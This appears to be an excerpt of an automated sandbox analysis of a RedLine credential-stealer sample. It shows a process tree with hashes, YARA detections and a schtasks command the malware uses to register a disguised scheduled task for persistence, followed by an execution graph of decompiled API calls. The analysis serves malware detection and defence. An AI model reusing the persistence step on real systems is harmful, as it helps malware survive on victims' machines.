                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:11
                      Start time:13:57:04
                      Start date:16/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:13:57:04
                      Start date:16/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpBBB1.tmp"
                      Imagebase:0xf90000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:13
                      Start time:13:57:05
                      Start date:16/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:14
                      Start time:13:57:05
                      Start date:16/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0x250000
                      File size:550'920 bytes
                      MD5 hash:8A9837F38BD2C2ADDA21106E3B75FFA8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:15
                      Start time:13:57:05
                      Start date:16/07/2024
                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0xe30000
                      File size:550'920 bytes
                      MD5 hash:8A9837F38BD2C2ADDA21106E3B75FFA8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      Target ID:16
                      Start time:13:57:05
                      Start date:16/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:17
                      Start time:13:57:07
                      Start date:16/07/2024
                      Path:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      Imagebase:0x660000
                      File size:550'920 bytes
                      MD5 hash:8A9837F38BD2C2ADDA21106E3B75FFA8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 83%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:18
                      Start time:13:57:07
                      Start date:16/07/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff6ef0c0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:20
                      Start time:13:57:14
                      Start date:16/07/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp"
                      Imagebase:0xf90000
                      File size:187'904 bytes
                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:21
                      Start time:13:57:14
                      Start date:16/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:22
                      Start time:13:57:14
                      Start date:16/07/2024
                      Path:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
                      Imagebase:0xc60000
                      File size:550'920 bytes
                      MD5 hash:8A9837F38BD2C2ADDA21106E3B75FFA8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:23
                      Start time:13:57:14
                      Start date:16/07/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff6d64d0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Reset < >

                        Execution Graph

                        Execution Coverage:10.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:4.7%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:36
                        execution_graph 21739 c8bdce 21749 c906b8 21739->21749 21743 c8bddb 21762 c90799 21743->21762 21746 c8be05 21747 c8a7fe _free 20 API calls 21746->21747 21748 c8be10 21747->21748 21766 c906c1 21749->21766 21751 c8bdd6 21752 c9056b 21751->21752 21753 c90577 ___FrameUnwindToState 21752->21753 21786 c8c542 EnterCriticalSection 21753->21786 21755 c905ed 21800 c90602 21755->21800 21757 c905f9 ___FrameUnwindToState 21757->21743 21758 c905c1 DeleteCriticalSection 21760 c8a7fe _free 20 API calls 21758->21760 21761 c90582 21760->21761 21761->21755 21761->21758 21787 c91d83 21761->21787 21763 c907af 21762->21763 21764 c8bdea DeleteCriticalSection 21762->21764 21763->21764 21765 c8a7fe _free 20 API calls 21763->21765 21764->21743 21764->21746 21765->21764 21767 c906cd ___FrameUnwindToState 21766->21767 21776 c8c542 EnterCriticalSection 21767->21776 21769 c90770 21781 c90790 21769->21781 21772 c9077c ___FrameUnwindToState 21772->21751 21774 c906dc 21774->21769 21775 c90671 66 API calls 21774->21775 21777 c8be1a EnterCriticalSection 21774->21777 21778 c90766 21774->21778 21775->21774 21776->21774 21777->21774 21784 c8be2e LeaveCriticalSection 21778->21784 21780 c9076e 21780->21774 21785 c8c58a LeaveCriticalSection 21781->21785 21783 c90797 21783->21772 21784->21780 21785->21783 21786->21761 21788 c91d8f ___FrameUnwindToState 21787->21788 21789 c91da0 21788->21789 21790 c91db5 21788->21790 21791 c8ac42 _free 20 API calls 21789->21791 21799 c91db0 ___FrameUnwindToState 21790->21799 21803 c8be1a EnterCriticalSection 21790->21803 21792 c91da5 21791->21792 21794 c8ab21 pre_c_initialization 26 API calls 21792->21794 21794->21799 21795 c91dd1 21804 c91d0d 21795->21804 21797 c91ddc 21820 c91df9 21797->21820 21799->21761 22063 c8c58a LeaveCriticalSection 21800->22063 21802 c90609 21802->21757 21803->21795 21805 c91d1a 21804->21805 21806 c91d2f 21804->21806 21807 c8ac42 _free 20 API calls 21805->21807 21812 c91d2a 21806->21812 21823 c9060b 21806->21823 21808 c91d1f 21807->21808 21811 c8ab21 pre_c_initialization 26 API calls 21808->21811 21811->21812 21812->21797 21813 c90799 20 API calls 21814 c91d4b 21813->21814 21829 c8bce0 21814->21829 21816 c91d51 21836 c9204b 21816->21836 21819 c8a7fe _free 20 API calls 21819->21812 22062 c8be2e LeaveCriticalSection 21820->22062 21822 c91e01 21822->21799 21824 c90623 21823->21824 21828 c9061f 21823->21828 21825 c8bce0 26 API calls 21824->21825 21824->21828 21826 c90643 21825->21826 21851 c9197d 21826->21851 21828->21813 21830 c8bcec 21829->21830 21831 c8bd01 21829->21831 21832 c8ac42 _free 20 API calls 21830->21832 21831->21816 21833 c8bcf1 21832->21833 21834 c8ab21 pre_c_initialization 26 API calls 21833->21834 21835 c8bcfc 21834->21835 21835->21816 21837 c9205a 21836->21837 21838 c9206f 21836->21838 21839 c8ac2f __dosmaperr 20 API calls 21837->21839 21840 c920aa 21838->21840 21844 c92096 21838->21844 21841 c9205f 21839->21841 21842 c8ac2f __dosmaperr 20 API calls 21840->21842 21843 c8ac42 _free 20 API calls 21841->21843 21845 c920af 21842->21845 21849 c91d57 21843->21849 22019 c92023 21844->22019 21846 c8ac42 _free 20 API calls 21845->21846 21848 c920b7 21846->21848 21850 c8ab21 pre_c_initialization 26 API calls 21848->21850 21849->21812 21849->21819 21850->21849 21852 c91989 ___FrameUnwindToState 21851->21852 21853 c919a9 21852->21853 21854 c91991 21852->21854 21856 c91a47 21853->21856 21860 c919de 21853->21860 21876 c8ac2f 21854->21876 21858 c8ac2f __dosmaperr 20 API calls 21856->21858 21861 c91a4c 21858->21861 21859 c8ac42 _free 20 API calls 21862 c9199e ___FrameUnwindToState 21859->21862 21879 c8de16 EnterCriticalSection 21860->21879 21864 c8ac42 _free 20 API calls 21861->21864 21862->21828 21866 c91a54 21864->21866 21865 c919e4 21867 c91a00 21865->21867 21868 c91a15 21865->21868 21869 c8ab21 pre_c_initialization 26 API calls 21866->21869 21871 c8ac42 _free 20 API calls 21867->21871 21880 c91a68 21868->21880 21869->21862 21873 c91a05 21871->21873 21872 c91a10 21931 c91a3f 21872->21931 21874 c8ac2f __dosmaperr 20 API calls 21873->21874 21874->21872 21877 c8b1a6 __dosmaperr 20 API calls 21876->21877 21878 c8ac34 21877->21878 21878->21859 21879->21865 21881 c91a96 21880->21881 21919 c91a8f 21880->21919 21882 c91ab9 21881->21882 21883 c91a9a 21881->21883 21886 c91b0a 21882->21886 21887 c91aed 21882->21887 21885 c8ac2f __dosmaperr 20 API calls 21883->21885 21884 c82495 CatchGuardHandler 5 API calls 21888 c91c70 21884->21888 21889 c91a9f 21885->21889 21891 c91b20 21886->21891 21934 c91cf2 21886->21934 21890 c8ac2f __dosmaperr 20 API calls 21887->21890 21888->21872 21892 c8ac42 _free 20 API calls 21889->21892 21894 c91af2 21890->21894 21937 c9160d 21891->21937 21896 c91aa6 21892->21896 21898 c8ac42 _free 20 API calls 21894->21898 21899 c8ab21 pre_c_initialization 26 API calls 21896->21899 21902 c91afa 21898->21902 21899->21919 21900 c91b2e 21903 c91b32 21900->21903 21904 c91b54 21900->21904 21901 c91b67 21906 c91b7b 21901->21906 21907 c91bc1 WriteFile 21901->21907 21905 c8ab21 pre_c_initialization 26 API calls 21902->21905 21908 c91c28 21903->21908 21944 c915a0 21903->21944 21949 c913ed GetConsoleCP 21904->21949 21905->21919 21911 c91bb1 21906->21911 21912 c91b83 21906->21912 21910 c91be4 GetLastError 21907->21910 21918 c91b4a 21907->21918 21908->21919 21920 c8ac42 _free 20 API calls 21908->21920 21910->21918 21975 c91683 21911->21975 21915 c91b88 21912->21915 21916 c91ba1 21912->21916 21915->21908 21960 c91762 21915->21960 21967 c91850 21916->21967 21918->21908 21918->21919 21923 c91c04 21918->21923 21919->21884 21922 c91c4d 21920->21922 21924 c8ac2f __dosmaperr 20 API calls 21922->21924 21925 c91c0b 21923->21925 21926 c91c1f 21923->21926 21924->21919 21927 c8ac42 _free 20 API calls 21925->21927 21982 c8ac0c 21926->21982 21929 c91c10 21927->21929 21930 c8ac2f __dosmaperr 20 API calls 21929->21930 21930->21919 22018 c8de39 LeaveCriticalSection 21931->22018 21933 c91a45 21933->21862 21987 c91c74 21934->21987 22009 c907d7 21937->22009 21939 c9161d 21940 c91622 21939->21940 21941 c8b122 _abort 38 API calls 21939->21941 21940->21900 21940->21901 21942 c91645 21941->21942 21942->21940 21943 c91663 GetConsoleMode 21942->21943 21943->21940 21945 c915fa 21944->21945 21948 c915c5 21944->21948 21945->21918 21946 c93154 WriteConsoleW CreateFileW 21946->21948 21947 c915fc GetLastError 21947->21945 21948->21945 21948->21946 21948->21947 21954 c91450 21949->21954 21955 c91562 21949->21955 21950 c82495 CatchGuardHandler 5 API calls 21952 c9159c 21950->21952 21951 c8c0e9 __vswprintf_c_l 38 API calls 21951->21954 21952->21918 21953 c8ad96 40 API calls __fassign 21953->21954 21954->21951 21954->21953 21954->21955 21956 c914d6 WideCharToMultiByte 21954->21956 21959 c9152d WriteFile 21954->21959 21955->21950 21956->21955 21957 c914fc WriteFile 21956->21957 21957->21954 21958 c91585 GetLastError 21957->21958 21958->21955 21959->21954 21959->21958 21963 c91771 21960->21963 21961 c91833 21964 c82495 CatchGuardHandler 5 API calls 21961->21964 21962 c917ef WriteFile 21962->21963 21965 c91835 GetLastError 21962->21965 21963->21961 21963->21962 21966 c9184c 21964->21966 21965->21961 21966->21918 21972 c9185f 21967->21972 21968 c9196a 21969 c82495 CatchGuardHandler 5 API calls 21968->21969 21970 c91979 21969->21970 21970->21918 21971 c918e1 WideCharToMultiByte 21973 c91962 GetLastError 21971->21973 21974 c91916 WriteFile 21971->21974 21972->21968 21972->21971 21972->21974 21973->21968 21974->21972 21974->21973 21979 c91692 21975->21979 21976 c91745 21977 c82495 CatchGuardHandler 5 API calls 21976->21977 21981 c9175e 21977->21981 21978 c91704 WriteFile 21978->21979 21980 c91747 GetLastError 21978->21980 21979->21976 21979->21978 21980->21976 21981->21918 21983 c8ac2f __dosmaperr 20 API calls 21982->21983 21984 c8ac17 _free 21983->21984 21985 c8ac42 _free 20 API calls 21984->21985 21986 c8ac2a 21985->21986 21986->21919 21996 c8deed 21987->21996 21989 c91c86 21990 c91c9f SetFilePointerEx 21989->21990 21991 c91c8e 21989->21991 21992 c91cb7 GetLastError 21990->21992 21993 c91c93 21990->21993 21994 c8ac42 _free 20 API calls 21991->21994 21995 c8ac0c __dosmaperr 20 API calls 21992->21995 21993->21891 21994->21993 21995->21993 21997 c8defa 21996->21997 21998 c8df0f 21996->21998 21999 c8ac2f __dosmaperr 20 API calls 21997->21999 22001 c8ac2f __dosmaperr 20 API calls 21998->22001 22003 c8df34 21998->22003 22000 c8deff 21999->22000 22002 c8ac42 _free 20 API calls 22000->22002 22004 c8df3f 22001->22004 22006 c8df07 22002->22006 22003->21989 22005 c8ac42 _free 20 API calls 22004->22005 22007 c8df47 22005->22007 22006->21989 22008 c8ab21 pre_c_initialization 26 API calls 22007->22008 22008->22006 22010 c907f1 22009->22010 22011 c907e4 22009->22011 22013 c907fd 22010->22013 22014 c8ac42 _free 20 API calls 22010->22014 22012 c8ac42 _free 20 API calls 22011->22012 22015 c907e9 22012->22015 22013->21939 22016 c9081e 22014->22016 22015->21939 22017 c8ab21 pre_c_initialization 26 API calls 22016->22017 22017->22015 22018->21933 22022 c91fa1 22019->22022 22021 c92047 22021->21849 22023 c91fad ___FrameUnwindToState 22022->22023 22033 c8de16 EnterCriticalSection 22023->22033 22025 c91fbb 22026 c91fed 22025->22026 22027 c91fe2 22025->22027 22028 c8ac42 _free 20 API calls 22026->22028 22034 c920ca 22027->22034 22030 c91fe8 22028->22030 22049 c92017 22030->22049 22032 c9200a ___FrameUnwindToState 22032->22021 22033->22025 22035 c8deed 26 API calls 22034->22035 22038 c920da 22035->22038 22036 c920e0 22052 c8de5c 22036->22052 22038->22036 22039 c92112 22038->22039 22041 c8deed 26 API calls 22038->22041 22039->22036 22042 c8deed 26 API calls 22039->22042 22044 c92109 22041->22044 22045 c9211e CloseHandle 22042->22045 22043 c9215a 22043->22030 22048 c8deed 26 API calls 22044->22048 22045->22036 22046 c9212a GetLastError 22045->22046 22046->22036 22047 c8ac0c __dosmaperr 20 API calls 22047->22043 22048->22039 22061 c8de39 LeaveCriticalSection 22049->22061 22051 c92021 22051->22032 22053 c8de6b 22052->22053 22054 c8ded2 22052->22054 22053->22054 22060 c8de95 22053->22060 22055 c8ac42 _free 20 API calls 22054->22055 22056 c8ded7 22055->22056 22057 c8ac2f __dosmaperr 20 API calls 22056->22057 22058 c8dec2 22057->22058 22058->22043 22058->22047 22059 c8debc SetStdHandle 22059->22058 22060->22058 22060->22059 22061->22051 22062->21822 22063->21802 22064 c8bfc3 22065 c8bfcf ___FrameUnwindToState 22064->22065 22076 c8c542 EnterCriticalSection 22065->22076 22067 c8bfd6 22077 c8dd7e 22067->22077 22069 c8bfe5 22075 c8bff4 22069->22075 22090 c8be57 GetStartupInfoW 22069->22090 22073 c8c005 ___FrameUnwindToState 22101 c8c010 22075->22101 22076->22067 22078 c8dd8a ___FrameUnwindToState 22077->22078 22079 c8ddae 22078->22079 22080 c8dd97 22078->22080 22104 c8c542 EnterCriticalSection 22079->22104 22081 c8ac42 _free 20 API calls 22080->22081 22083 c8dd9c 22081->22083 22085 c8ab21 pre_c_initialization 26 API calls 22083->22085 22084 c8ddba 22089 c8dde6 22084->22089 22105 c8dccf 22084->22105 22086 c8dda6 ___FrameUnwindToState 22085->22086 22086->22069 22112 c8de0d 22089->22112 22091 c8bf06 22090->22091 22092 c8be74 22090->22092 22096 c8bf0d 22091->22096 22092->22091 22093 c8dd7e 27 API calls 22092->22093 22094 c8be9d 22093->22094 22094->22091 22095 c8becb GetFileType 22094->22095 22095->22094 22097 c8bf14 22096->22097 22098 c8bf57 GetStdHandle 22097->22098 22099 c8bfbf 22097->22099 22100 c8bf6a GetFileType 22097->22100 22098->22097 22099->22075 22100->22097 22116 c8c58a LeaveCriticalSection 22101->22116 22103 c8c017 22103->22073 22104->22084 22106 c8a8c9 _CallSETranslator 20 API calls 22105->22106 22107 c8dce1 22106->22107 22109 c8c813 11 API calls 22107->22109 22111 c8dcee 22107->22111 22108 c8a7fe _free 20 API calls 22110 c8dd40 22108->22110 22109->22107 22110->22084 22111->22108 22115 c8c58a LeaveCriticalSection 22112->22115 22114 c8de14 22114->22086 22115->22114 22116->22103 19618 c7218a 19619 c7219d 19618->19619 19623 c72196 19618->19623 19620 c721a3 GetStdHandle 19619->19620 19622 c721ae 19619->19622 19620->19622 19621 c72203 WriteFile 19621->19622 19622->19621 19622->19623 19624 c721d3 WriteFile 19622->19624 19625 c721ce 19622->19625 19627 c72276 19622->19627 19629 c71791 19622->19629 19624->19622 19624->19625 19625->19622 19625->19624 19633 c7199e 19627->19633 19630 c7179a 19629->19630 19632 c717a7 19629->19632 19638 c76982 19630->19638 19632->19622 19647 c719bb 19633->19647 19635 c719ae 19636 c7194e RaiseException 19635->19636 19637 c719b7 19636->19637 19637->19623 19639 c7698f 19638->19639 19640 c73fb9 54 API calls 19639->19640 19641 c7699e 19640->19641 19642 c736d0 _swprintf 51 API calls 19641->19642 19643 c769b0 GetLastError 19642->19643 19644 c73fb9 54 API calls 19643->19644 19645 c769c7 19644->19645 19646 c769da SetLastError 19645->19646 19646->19632 19648 c716e1 67 API calls 19647->19648 19649 c719cd 19648->19649 19649->19635 21141 c71092 21146 c74bbc 21141->21146 21147 c74d6a 72 API calls 21146->21147 21148 c71097 21147->21148 21149 c81e8e 21148->21149 21152 c81e53 21149->21152 21153 c81e70 21152->21153 21154 c81e77 21152->21154 21158 c8a18a 21153->21158 21161 c8a1fa 21154->21161 21157 c710a1 21159 c8a1fa __onexit 29 API calls 21158->21159 21160 c8a19c 21159->21160 21160->21157 21164 c89f01 21161->21164 21167 c89e37 21164->21167 21166 c89f25 21166->21157 21168 c89e43 ___FrameUnwindToState 21167->21168 21175 c8c542 EnterCriticalSection 21168->21175 21170 c89e51 21176 c8a049 21170->21176 21172 c89e5e 21186 c89e7c 21172->21186 21174 c89e6f ___FrameUnwindToState 21174->21166 21175->21170 21177 c8a067 21176->21177 21184 c8a05f pre_c_initialization __crt_fast_encode_pointer 21176->21184 21178 c8a0c0 21177->21178 21177->21184 21189 c8d81d 21177->21189 21180 c8d81d __onexit 29 API calls 21178->21180 21178->21184 21182 c8a0d6 21180->21182 21181 c8a0b6 21183 c8a7fe _free 20 API calls 21181->21183 21185 c8a7fe _free 20 API calls 21182->21185 21183->21178 21184->21172 21185->21184 21198 c8c58a LeaveCriticalSection 21186->21198 21188 c89e86 21188->21174 21190 c8d828 21189->21190 21191 c8d850 21190->21191 21192 c8d841 21190->21192 21193 c8d85f 21191->21193 21195 c90f73 __onexit 27 API calls 21191->21195 21194 c8ac42 _free 20 API calls 21192->21194 21196 c8c080 __onexit 22 API calls 21193->21196 21197 c8d846 ___scrt_fastfail 21194->21197 21195->21193 21196->21197 21197->21181 21198->21188 20632 c7ff9f 20633 c7ffa8 GetTempPathW 20632->20633 20647 c7f95f _wcsrchr 20632->20647 20638 c7ffc8 20633->20638 20634 c7e5b0 ExpandEnvironmentStringsW 20634->20647 20635 c80508 20636 c736d0 _swprintf 51 API calls 20636->20638 20637 c723ea 4 API calls 20637->20638 20638->20636 20638->20637 20639 c7ffff SetDlgItemTextW 20638->20639 20643 c8001d _wcschr 20639->20643 20639->20647 20641 c7fc4c SetWindowTextW 20641->20647 20645 c80109 EndDialog 20643->20645 20643->20647 20644 c7e708 69 API calls 20644->20647 20645->20647 20646 c727a3 7 API calls 20646->20647 20647->20634 20647->20635 20647->20641 20647->20644 20647->20646 20649 c7272c FindClose 20647->20649 20660 c7fa30 ___scrt_fastfail 20647->20660 20662 c76fa3 CompareStringW 20647->20662 20663 c7dac4 GetCurrentDirectoryW 20647->20663 20648 c7fa3d SetFileAttributesW 20650 c7faf8 GetFileAttributesW 20648->20650 20648->20660 20649->20647 20652 c7fb06 DeleteFileW 20650->20652 20650->20660 20651 c731a0 52 API calls 20651->20660 20652->20660 20653 c7fe16 GetDlgItem SetWindowTextW SendMessageW 20653->20660 20654 c727a3 7 API calls 20654->20660 20655 c736d0 _swprintf 51 API calls 20657 c7fb3b GetFileAttributesW 20655->20657 20656 c7fe58 SendMessageW 20656->20647 20658 c7fb4c MoveFileW 20657->20658 20657->20660 20659 c7fb64 MoveFileExW 20658->20659 20658->20660 20659->20660 20660->20647 20660->20648 20660->20651 20660->20653 20660->20654 20660->20655 20660->20656 20661 c7fad4 SHFileOperationW 20660->20661 20661->20650 20662->20647 20663->20647 17773 c815a9 17774 c8157a 17773->17774 17776 c818a5 17774->17776 17804 c815b3 17776->17804 17778 c818bf 17779 c8191c 17778->17779 17780 c81940 17778->17780 17815 c81823 17779->17815 17783 c819b8 LoadLibraryExA 17780->17783 17785 c81a19 17780->17785 17790 c81a2b 17780->17790 17793 c81ae7 17780->17793 17783->17785 17786 c819cb GetLastError 17783->17786 17785->17790 17791 c81a24 FreeLibrary 17785->17791 17788 c819f4 17786->17788 17795 c819de 17786->17795 17787 c81b24 17787->17774 17792 c81823 DloadReleaseSectionWriteAccess 11 API calls 17788->17792 17789 c81a89 GetProcAddress 17789->17793 17794 c81a99 GetLastError 17789->17794 17790->17789 17790->17793 17791->17790 17796 c819ff RaiseException 17792->17796 17798 c81823 DloadReleaseSectionWriteAccess 11 API calls 17793->17798 17797 c81aac 17794->17797 17795->17785 17795->17788 17800 c81b15 17796->17800 17797->17793 17799 c81823 DloadReleaseSectionWriteAccess 11 API calls 17797->17799 17798->17800 17801 c81acd RaiseException 17799->17801 17823 c82495 17800->17823 17802 c815b3 ___delayLoadHelper2@8 11 API calls 17801->17802 17803 c81ae4 17802->17803 17803->17793 17805 c815bf 17804->17805 17806 c815e5 17804->17806 17830 c81661 17805->17830 17806->17778 17809 c815e0 17840 c815e6 17809->17840 17812 c82495 CatchGuardHandler 5 API calls 17813 c818a1 17812->17813 17813->17778 17814 c81870 17814->17812 17816 c81835 17815->17816 17817 c81857 RaiseException 17815->17817 17818 c81661 DloadLock 8 API calls 17816->17818 17817->17800 17820 c8183a 17818->17820 17819 c81852 17852 c8185b 17819->17852 17820->17819 17821 c817b3 DloadProtectSection 3 API calls 17820->17821 17821->17819 17824 c8249e 17823->17824 17825 c824a0 IsProcessorFeaturePresent 17823->17825 17824->17787 17827 c82b03 17825->17827 17857 c82ac7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17827->17857 17829 c82be6 17829->17787 17831 c815e6 DloadLock 3 API calls 17830->17831 17832 c81676 17831->17832 17833 c82495 CatchGuardHandler 5 API calls 17832->17833 17834 c815c4 17833->17834 17834->17809 17835 c817b3 17834->17835 17837 c817c8 DloadObtainSection 17835->17837 17836 c817ce 17836->17809 17837->17836 17838 c81803 VirtualProtect 17837->17838 17848 c816be VirtualQuery 17837->17848 17838->17836 17841 c815f3 17840->17841 17842 c815f7 17840->17842 17841->17814 17843 c815fb 17842->17843 17844 c815ff GetModuleHandleW 17842->17844 17843->17814 17845 c81615 GetProcAddress 17844->17845 17847 c81611 17844->17847 17846 c81625 GetProcAddress 17845->17846 17845->17847 17846->17847 17847->17814 17849 c816d9 17848->17849 17850 c8171c 17849->17850 17851 c816e4 GetSystemInfo 17849->17851 17850->17838 17851->17850 17853 c815e6 DloadLock 3 API calls 17852->17853 17856 c81870 17853->17856 17854 c82495 CatchGuardHandler 5 API calls 17855 c818a1 17854->17855 17855->17817 17856->17854 17857->17829 22328 c8a5b9 22329 c8a5c5 ___FrameUnwindToState 22328->22329 22330 c8a5fc ___FrameUnwindToState 22329->22330 22336 c8c542 EnterCriticalSection 22329->22336 22332 c8a5d9 22333 c8e63f __fassign 20 API calls 22332->22333 22334 c8a5e9 22333->22334 22337 c8a602 22334->22337 22336->22332 22340 c8c58a LeaveCriticalSection 22337->22340 22339 c8a609 22339->22330 22340->22339 19650 c81b45 19651 c81b4f 19650->19651 19652 c818a5 ___delayLoadHelper2@8 19 API calls 19651->19652 19653 c81b5c 19652->19653 21492 c8b00d 21493 c8b018 21492->21493 21494 c8b028 21492->21494 21498 c8b02e 21493->21498 21497 c8a7fe _free 20 API calls 21497->21494 21499 c8b047 21498->21499 21500 c8b041 21498->21500 21502 c8a7fe _free 20 API calls 21499->21502 21501 c8a7fe _free 20 API calls 21500->21501 21501->21499 21503 c8b053 21502->21503 21504 c8a7fe _free 20 API calls 21503->21504 21505 c8b05e 21504->21505 21506 c8a7fe _free 20 API calls 21505->21506 21507 c8b069 21506->21507 21508 c8a7fe _free 20 API calls 21507->21508 21509 c8b074 21508->21509 21510 c8a7fe _free 20 API calls 21509->21510 21511 c8b07f 21510->21511 21512 c8a7fe _free 20 API calls 21511->21512 21513 c8b08a 21512->21513 21514 c8a7fe _free 20 API calls 21513->21514 21515 c8b095 21514->21515 21516 c8a7fe _free 20 API calls 21515->21516 21517 c8b0a0 21516->21517 21518 c8a7fe _free 20 API calls 21517->21518 21519 c8b0ae 21518->21519 21524 c8aef4 21519->21524 21530 c8ae00 21524->21530 21526 c8af18 21527 c8af44 21526->21527 21543 c8ae61 21527->21543 21529 c8af68 21529->21497 21531 c8ae0c ___FrameUnwindToState 21530->21531 21538 c8c542 EnterCriticalSection 21531->21538 21534 c8ae16 21536 c8a7fe _free 20 API calls 21534->21536 21537 c8ae40 21534->21537 21535 c8ae4d ___FrameUnwindToState 21535->21526 21536->21537 21539 c8ae55 21537->21539 21538->21534 21542 c8c58a LeaveCriticalSection 21539->21542 21541 c8ae5f 21541->21535 21542->21541 21544 c8ae6d ___FrameUnwindToState 21543->21544 21551 c8c542 EnterCriticalSection 21544->21551 21546 c8ae77 21547 c8b0d7 __dosmaperr 20 API calls 21546->21547 21548 c8ae8a 21547->21548 21552 c8aea0 21548->21552 21550 c8ae98 ___FrameUnwindToState 21550->21529 21551->21546 21555 c8c58a LeaveCriticalSection 21552->21555 21554 c8aeaa 21554->21550 21555->21554 22449 c8150f 22450 c81519 22449->22450 22451 c818a5 ___delayLoadHelper2@8 19 API calls 22450->22451 22451->22450 18762 c8c501 18763 c8c50c 18762->18763 18765 c8c535 